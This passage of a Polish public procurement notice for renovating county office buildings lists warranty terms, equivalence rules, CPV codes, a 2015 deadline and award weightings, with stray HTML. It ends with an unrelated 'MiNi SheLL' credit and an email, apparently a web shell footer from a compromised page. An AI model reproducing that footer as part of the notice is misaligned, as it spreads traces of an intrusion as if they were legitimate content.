Informacje dotyczące obu części zamówienia:

UWAGA:
a)	W przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych  we wszystkich pozycjach, w których występuje nazwa producenta Zamawiający dopuszcza możliwość wykorzystania produktów równoważnych tzn. o nie gorszych parametrach technicznych niż te, które posiadają wskazane za pomocą znaku towarowego czy pochodzenia produkty.
b)	W przypadkach, w których przedmiot zamówienia opisany jest za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1-3 ustawy, Zamawiający wskazuje, że dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego.
c)	Zamawiający wymaga, by na przedmiotowe roboty wykonawca udzielił minimum pięcioletniej gwarancji.
d)	Budynki starostwa w całym okresie realizacji niniejszego zamówienia będą użytkowane. Wykonawca musi w taki sposób zorganizować roboty budowlane, aby możliwe było niezakłócone użytkowanie obiektów. Wykonawca w trakcie realizacji robót budowlanych musi zapewnić również bezpieczeństwo osobom przebywającym w budynku.
e)	Niniejsza specyfikacja opisuje przedmiot zamówienia w sposób kompletny. Jednakże w celu lepszego zapoznania się z przedmiotem zamówienia Zamawiający umożliwia dokonanie przez Wykonawcę (na własny koszt) oględzin miejsc, w których nastąpi realizacja przedmiotu zamówienia i jego otoczenia i zaleca szczegółowe zapoznanie się z dokumentacją.
f)	Przed przystąpieniem do realizacji zamówienia Wykonawca zobowiązany jest uzgodnić z Zamawiającym harmonogram prac remontowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.19.10-6, 45.45.30.00-7, 45.26.26.90-4, 45.40.00.00-1, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja na wykonane roboty budowlane - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com